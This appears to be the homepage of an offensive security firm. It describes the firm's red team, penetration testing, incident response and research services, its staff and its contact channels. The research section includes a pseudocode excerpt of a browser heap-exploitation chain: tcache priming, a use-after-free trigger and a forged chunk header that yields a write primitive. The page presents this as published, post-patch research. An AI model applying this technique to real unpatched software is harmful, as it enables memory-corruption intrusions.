vector // offensive security // est. 2017
We test what your blue team hopes you never need.
Vector is a boutique offensive firm. Red team, penetration testing, incident response, and original research. We work with security teams who already understand the discipline and want operator perspective, not consultant decks.
// services
Four practices. Each one signed off by the principal who runs it.
S-01
Red team
Adversary emulation against your live environment. Goal-driven, scoped to objectives, reported with timeline and indicators.
- Initial access, persistence, lateral movement
- Custom tradecraft when off-the-shelf gets caught
- Detection coverage written up against your SIEM
S-02
Penetration testing
Application and infrastructure tests with vulnerability severity reasoned, not auto-scored. We tell you what would actually be exploited next quarter.
- Web, mobile, and API surface tests
- Internal and external network engagements
- Cloud configuration review across AWS, GCP, Azure
S-03
Incident response
Retainer or surge engagement for live incidents. Forensic acquisition, scoping, containment, and a written post-incident report you can use.
- First contact within four hours of retainer call
- Counsel-friendly evidence handling
- Full timeline reconstruction with artifacts
S-04
Research
Original vulnerability research and capability development. We publish what we can, hold what we cannot, and credit responsibly when third-party work informs ours.
- CVE-tracked disclosures across browsers and runtimes
- Conference talks at DEF CON, Black Hat, Recon
- Internal capability libraries used in red team
// research
An excerpt from CVE-2026-2117: a chained allocator path.
Published three weeks ago against a fixed, current major browser. The full writeup, exploitation video, and patch analysis are in the research directory.
# heap layout primer (target build, x86_64)
size = 0x70 # falls into tcache bin idx 6
align = 0x10 # malloc returns 16-byte aligned chunks
goal = overlap freed buffer with adjacent in-use buffer
# step 1: prime tcache idx 6 with 7 freed chunks
for i in range(7):
    free(alloc(0x70))
# step 2: trigger UAF via path A (see report sec 3.2)
trigger_a()
# step 3: place fake chunk header inside attacker-controlled mmap
# attacker-controlled length tricks subsequent realloc()
# into returning into the fake header region
fake_chunk[0x8] = 0x71 # size + prev_inuse
fake_chunk[0x10] = leaked_lib_addr ^ tcache_key
# step 4: subsequent allocation returns into mapped region.
# write primitive achieved.
We held disclosure 47 days past patch ship to give downstream distributions time to backport. The bounty was donated to the EFF in the reporter's name.
// engagements
Names get redacted. Outcomes do not.
Most engagements are under NDA. We publish work only when the client agrees, or when responsible disclosure has run its course. The list below is the redacted roster of the last eighteen months.
- [REDACTED] // FORTUNE 50 RETAILER
- [REDACTED] // PUBLIC INFRASTRUCTURE
- [REDACTED] // EU PAYMENTS PLATFORM
- [REDACTED] // CRITICAL HEALTHCARE
- [REDACTED] // FAANG ADJACENT
- [REDACTED] // SOVEREIGN AGENCY
- [REDACTED] // AEROSPACE PRIME
- [REDACTED] // DOMESTIC TELCO
// who you work with
No bench. The people who run the firm run the engagements.
@ks
Principal, Red Team
Twelve years offensive. Previously at a federal contractor. Speaks at Recon. Maintains the in-house C2 framework.
@ml
Principal, Application Security
Background in compiler internals. Wrote the team's fuzzing harness. Three browser CVEs since 2022.
@rh
Director, Incident Response
Spent six years on the response side of nation-state intrusions. Coordinates retainers and surge calls.
Most security firms grow until the people on the proposal are not the people on the engagement. We do not. If you sign with Vector, the operator named on the SOW is in the kickoff, in the daily standup, and writing the report by hand.
We will turn down a piece of work before we hand it to someone who has not done it. That is the shape of the firm.
// engage
How to reach us.
Mastodon
@vector@infosec.exchange
For research, conference, and disclosure threads.
Signal
+1 415 555 0042
Initial scoping for retainer or incident calls. PGP on request.
In person
San Francisco, Berlin, Toronto
We come to your office for kickoff. We do not host clients in ours.
We do not run a contact form. We do not respond to LinkedIn messages. Pick a channel above.